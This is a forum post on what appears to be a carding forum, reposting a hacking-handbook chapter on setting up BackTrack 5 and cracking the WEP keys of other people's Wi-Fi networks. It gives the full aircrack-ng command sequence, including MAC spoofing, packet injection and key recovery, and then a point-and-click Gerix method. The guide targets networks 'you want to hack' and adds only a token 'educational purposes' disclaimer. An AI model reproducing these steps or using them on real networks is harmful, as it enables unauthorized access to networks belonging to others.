Hacking Wifi - 6 Methods [Hacking Handbooks]

R_Alex

Well-known member
Nov 11, 2018
1,143
521
83
30
USA
www.russiancarders.se
#1
Hacking Wifi - [Hacking Handbooks]

URL: https://www.hackershandbook.org

Setup BackTrack 5

This guide will show you how to download and setup BackTrack 5 to either boot off of USB, DVD, or dual-boot. Backtrack 5 is a linux build filled with a bunch of useful penetration testing tools, and will be used in the WiFi hacking tutorials as well as hacking PC tutorials.

USB method
using just a USB drive, you can run backtrack on any computer without installing anything.

What you need:

4GB+ USB flash drive
Windows PC
BackTrack 5 ISO file
UNetbootin

Download the BackTrack 5 ISO from https://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Download UNetbootin from https://unetbootin.sourceforge.net/ for windows and install it.
Plug your USB drive into your PC
Format the USB drive to FAT3 Note: this will delete all files on the flash drive.
Open UNetbootin and choose diskimage
Select the BackTrack 5 ISO file you downloaded.
Set the amount of space you would like to use for persistence in MB
Select your USB drive to create a bootable BackTrack 5
Now when you plug your flash drive into any computer and turn it on, you can boot off the flash drive. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your USB drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.

DVD method
using just a DVD, you can run backtrack on any computer with a dvd drive without installing anything.

What you need:

Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero

Download the BackTrack 5 ISO from https://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed.
Now when you insert your DVD into any computer and turn it on, you can boot off the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.


Dual-boot method
setup BackTrack 5 to dual boot along side your Windows 7 installation. When you boot up your computer, you'll be able to choose if you want to boot into Windows 7 or boot into BackTrack 5

What you need:

Blank DVD and DVD burner
Windows PC
BackTrack 5 ISO file
Software to burn ISO to a DVD. Windows 7 has an image burner built in. Other good options are Magic ISO or Nero

Download the BackTrack 5 ISO from https://www.backtrack-linux.org/downloads/. Make sure you choose either 32-bit or 64-bit. Gnome or KDE options don't matter, so you can choose either.
Use the image burning software of your choice to burn the BackTrack5 ISO to dvd. It's recommended you choose the slowest burning speed.
With the DVD in your drive, reboot and boot of the disc. If it doesn't do this automatically, open the computers boot options at start up. Usually you can access this screen by pressing esc key when its booting up. Select your dvd drive and BackTrack 5 will now boot up. When it asks you to login, the username/password is root // toor.
Once your at the BackTrack 5 desktop, you will see an install file on the desktop. Run this and follow the steps until installation is completed. It will ask you for your language, time zone, and how much of your hard drive you'd like to use for BackTrack
Reboot, and you will now have the option to boot into Windows 7 or BackTrack 5

====================================================================================

Cracking WEP

This chapter will teach you how to crack the WEP of a wireless network using BackTrack 4 step by step. BackTrack is a free OS available for download at https://www.backtrack-linux.org/downloads/. This tutorial is using BackTrack 4, but it should work similar in newer versions. Backtrack is the ultimate security testing OS, and is preloaded with hundreds of tools you can use to hack. We're only going to be using a couple for this tutorial.

What you will need:

Computer (Windows, Mac, Linux, any OS)
Wireless card that supports promiscuous mode (Most do, if yours isn't compatible you can buy one that is at any computer store. Check compatibility here: https://www.aircrack-ng.org/doku.php...7...ard_to_buy)
Optional: Flash drive or blank DVD

Download the BackTrack 4 flavor of your choice. You can either boot the OS using VMware within windows, or you can boot backtrack straight off of a DVD or flash drive. Instructions for each of these methods are on the backtrack website.
Once you have booted up backtrack, it will ask you for a username and password. username: root password: toor
Now type startx and press enter. This will log you into backtrack and you should now see the desktop.
Open a command terminal. You can do this by clicking the black box icon bottom left corner of the screen.
type in: airmon-ng
Look for the name of your wireless card, its different for a lot of computers, mine is wlan0, so for the rest of this guide thats what i'm going to use. Replace wlan0 in all the following steps with whatever your device name is.
type: airmon-ng stop wlan0
type: macchanger --mac 00:11:22:33:44:55 wlan0
type: airmon-ng start wlan0
type: airodump-ng wlan0
You will now see all of the wifi networks in range. once you found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
type: airodump-ng -c (put the channel # here) -w wephack --bssid (enter bssid here) wlan0
Keep that window open, now open another command terminal and enter the following in the newly opened terminal:
type: aireplay-ng -1 0 -a (enter bssid here) -h 00:11:22:33:44:55 wlan0
type: aireplay-ng -3 -b (enter bssid here) -h 00:11:22:33:44:55 wlan0
Now go back to the 1st window, you'll notice a number steadily increasing. Once its over about 10,000 you can attempt to crack the WEP key. If this doesn't work, wait until the # is even higher, try again at 15,000 and so on
open a new command window and type: aircrack-ng -b (enter bssid) wephack-0.cap
You should now see it attempting to crack the WEP key. This could take up to 5 minutes or so depending on how fast your computer is. When its found the key, it will appear on the screen. You can now log into that network using the WEP on the screen Smile

NOTES:

Usually, for this to work flawlessly, someone has to be currently using the internet on the network you're trying to hack, or else it could take awhile for you to get enough packets to crack the WEP.

It is illegal to steal wireless internet. Only try this on your own network. This guide is for educational purposes only, as with everything in this ebook. Use at your own risk.

====================================================================================

Cracking WEP (easy)

This tutorial goes over an easier method to crack WEP thats mostly automated and doesn't require any coding to be typed in. This method only takes abut 5 minutes.

What you need:

- Backtrack 5 on either a DVD, flash drive, dual boot, etc. ( you can get this from https://www.backtrack-linux.org/downloads/ )
- A wifi card that can inject. If you boot backtrack off a VMware, the wifi card must be USB

Boot into backtrack 5. If you've never done this before, refer to the website where you can download it. Basically you can boot directly off a flash drive (my favorite), off a DVD, or you can setup a VMware. When you first boot up backtrack it will ask you for a username and password, which is root // toor and then you will need to type startx
Once you're at the backtrack 5 desktop screen, click applications > backtrack > exploitation tools > wireless exploitation > wlan exploitation > gerix-wifi-cracker-ng
Goto the config tab
Click on your wireless card in the top box
Click enable/disable monitor mode
This will create a new wireless device in the box; select this. (note: after selecting, you may need to press set random mac address)
Choose all channels in the drop down, or if you know the channel the wifi you want to hack into is on, choose that.
Click on rescan and click on the network you want to hack
Goto the WEP tab
If you have low signal, you'll want to use the chopchop options to crack the WEP. If you have a stronger signal, you'll be using the fragmentation options. Click all of the buttons in the section you choose, starting from the top working your way down. Command windows appear, if they ask you anything say yes.
You'll see your IV's going up. Wait until you have about 15,000 IV's before continuing to the next step.
Goto the cracking tab
Click aircrack-ng decrypt wep password

You're done Smile

ICQ: 78010000
 
Jan 21, 2021
1
0
1
#2
Как поменять пароль?
Может мне создать новый логин и пароль?
Прошу подсказать.
С уважением.
 

Log in

Online statistics

Members online
1
Guests online
74
Total visitors
75